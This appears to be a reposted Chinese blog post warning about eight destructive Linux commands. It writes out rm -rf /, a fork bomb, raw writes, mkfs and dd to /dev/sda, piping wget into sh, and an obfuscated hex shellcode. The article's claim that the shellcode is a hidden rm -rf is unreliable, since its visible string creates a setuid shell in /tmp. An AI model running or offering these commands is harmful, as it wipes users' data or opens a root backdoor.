1. 程式人生 > >八個最致命的Linux命令!

八個最致命的Linux命令!

新建Python軟體開發測試技術交友群QQ:952490269(加群備註software)

1,rm -rf Command

rm -rf命令是刪除資料夾及其內容的最快方法之一。但是一點點錯字或失誤可能會導致不可恢復的系統損壞。與rm命令一起使用的一些選項是:

rm 命令用於刪除檔案。
rm -r命令以遞迴方式刪除資料夾,甚至是空資料夾。
rm -f命令在不詢問的情況下刪除“只讀檔案”。
rm -rf /:強制刪除根目錄中的所有內容。
rm -rf *:強制刪除當前目錄/工作目錄中的所有內容
rm -rf. :強制刪除當前資料夾和子資料夾。
rm -rf ~將刪除主資料夾中的所有檔案,
而rm -rf .*將刪除所有配置檔案。

因此,執行rm -rf命令時要小心。如果通過'rm'命令來克服意外刪除檔案,可以在“.bashrc”檔案中建立'rm'命令的別名為'rm -i',它會要求確認每次刪除。

 

2,:(){:|:&};:

以上實際上是一個fork炸彈。它通過定義一個名為':'的函式來執行,該函式呼叫自身兩次,一次在前臺,一次在後臺。它一直持續執行,直到系統凍結。

:(){:|:&};:

這短短的一行定義了一個shell函式,它可以建立自己的新副本。程序不斷地複製自己,它的副本不斷地複製自己,很快地佔用了所有的CPU時間和記憶體。這會導致你的主機宕機。這基本上是一種拒絕服務攻擊。

 

3,command > /dev/sda

上面的命令將'command'的輸出寫入塊/ dev / sda。它執行一個命令並將該命令的輸出直接傳送到第一個硬碟驅動器,將資料直接寫入硬碟驅動器並損壞檔案系統。

command - 執行命令(可以是任何命令。)
/ dev / sda - 將命令的輸出直接寫入硬碟裝置。

塊上的所有檔案將被原始資料替換,從而導致塊上的資料完全丟失。

 

4,mv folder /dev/null

上面的命令會將'folder'移動到/ dev / null。在Linux ,dev / null或null是一個特殊檔案,它丟棄寫入它的所有資料並報告寫操作成功。例如:

mv~ / dev / null - 將您的主目錄移動到黑洞

mv - 將以下檔案或目錄移動到另一個位置。 

〜 - 表示整個主資料夾。 

/ dev / null - 將您的主資料夾移動到/ dev / null,銷燬所有檔案並刪除原始副本。

 

5,wget http://example.com/something -O- | sh

上面的命令從Web下載指令碼並將其傳送到sh,後者執行指令碼的內容。

wget -下載一個檔案。

http://example.com/something——從這個位置下載檔案。

| 將wget命令(您下載的檔案)的輸出直接傳送到另一個命令。

sh -將檔案傳送到sh命令,如果是bash指令碼,sh命令就會執行它。

如果您不確定指令碼是什麼,或者您不信任其來源,那麼這可能很危險 - 不要執行不受信任的指令碼。

 

6. mkfs.ext3 /dev/sda

上面的命令將格式化塊'sda',你肯定會知道執行上述命令後你的Block(硬碟驅動器)將是新的,全新的!沒有任何資料,將您的系統置於不可恢復的階段。

mkfs.ext3 /dev/sda

總而言之,此命令可以等同於在Windows上執行格式c:它將擦除第一個分割槽上的檔案並用新檔案系統替換它們。

 

7,dd if=/dev/random of=/dev/sda

上面的命令將清除塊sda並將隨機垃圾資料寫入塊。

dd if=/dev/random of=/dev/sda

當然!您的系統將處於不一致且不可恢復的階段。

 

8,被隱藏的命令

以下命令只是上面的第一個命令(rm -rf)。這裡的程式碼以十六進位制隱藏,以便無知的使用者可能被欺騙。在終端中執行以下程式碼將擦除根分割槽。

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
這種被隱藏的危險命令,通常無法被檢測到。你必須知道你在做什麼以及結果會是什麼。不要編譯或者執行來自未知來源的程式碼。